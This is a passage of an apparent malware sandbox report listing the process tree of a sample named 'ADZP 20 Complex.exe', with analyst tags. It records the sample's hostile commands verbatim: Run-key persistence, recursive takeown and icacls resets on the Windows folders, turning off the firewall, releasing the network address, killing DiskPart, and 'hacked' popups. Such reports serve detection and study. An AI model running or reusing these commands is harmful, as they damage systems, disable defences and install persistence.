        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:8312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:8352
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7928
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8524
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8624
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:8804
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8896
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10200
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:5440
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:6964
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10012
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10280
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10604
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10892
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:11224
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:8476
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:11140
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:9852
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:8768
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:11304
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:11792
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4D0D.tmp\4D0E.tmp\4D0F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:11148
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        10⤵
        
        PID:14444
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D0B0.tmp\D0B0.tmp\D0B1.bat C:\Windows\System32\Twain_20.dll"
        11⤵
        
        PID:10864
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:15240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:13760
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:12100
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:12188
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:12236
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:12268
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:2692
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5644.tmp\5645.tmp\5646.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:12572
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8304
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9204
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11252
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:10576
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7460
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BC2.tmp\5BC3.tmp\5BC4.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:12696
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:4328
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8208
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11308
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:11304
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12404
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:13216
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:13336
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14224
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6884
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6904
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6920
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:6932
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6944
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C3EC.tmp\C3ED.tmp\C3EE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:2280
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6184
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6400
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6156
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:6228
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:8760
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:9004
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:548
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:8516
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:8624
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:9012
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2472
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:1192
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2380
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:3204
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:5112
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\537F.tmp\5380.tmp\5381.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:3084
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:5948
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:6084
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:3816
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:1964
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5148
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:1884
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:548
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:5284
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:2560
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:2668
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:5180
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:7448
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:7988
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:8024
    - - C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        5⤵
        
        PID:8044
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8060
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F25F.tmp\106.tmp\174.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:2668
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        8⤵
        
        PID:8912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:9036
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:9064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7608
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:6076
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8424
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:4704
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9308
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:9636
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9888
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10072
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:5452
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:6496
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:3636
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10152
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10464
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10716
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:11004
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:11040
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:7472
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8364
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\232E.tmp\232F.tmp\2330.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:7044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:13408
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:12312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:10420
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        10⤵
        
        PID:8912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\203B.tmp\203C.tmp\203D.bat C:\Windows\System32\Twain_20.dll"
        11⤵
        
        PID:10236
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        9⤵
        
        PID:13104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:9376
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:14596
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:14860
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:9456
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4340
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:14296
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:9112
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:15228
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:2832
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:11376
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:5816
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        
        PID:6232
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4232
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:5772
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:1316
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:8020
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:448
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:3592
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:13236
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        
        PID:3076
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:6044
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:14448
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        
        PID:1004
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:11780
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        
        PID:5252
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:12868
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:10872
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        
        PID:12304
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:11412
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        
        PID:10668
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        
        PID:1748
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:14752
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:14772
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:9500
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:8108
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:8104
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8092
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        
        PID:11928
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:12464
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:12460
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:5428
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2120
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Modifies file permissions
        
        PID:9848
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        
        PID:9468
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:6844
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13280
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        
        PID:14888
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:12876
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12496
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:14840
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:12788
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:9580
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:14904
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:11468
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7128
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:14320
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3928
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        
        PID:12640
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        
        PID:14808
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        
        PID:9772
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:15068
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:1032
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:15256
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:9112
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:4584
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:3860
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        
        PID:9876
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:8076
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5780
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:13192
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        
        PID:448
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:3592
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:1180
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:1184
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:11840
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Modifies file permissions
        
        PID:6736
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        
        PID:14736
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5252
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6416
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:11412
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:9720
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:15172
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:12708
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
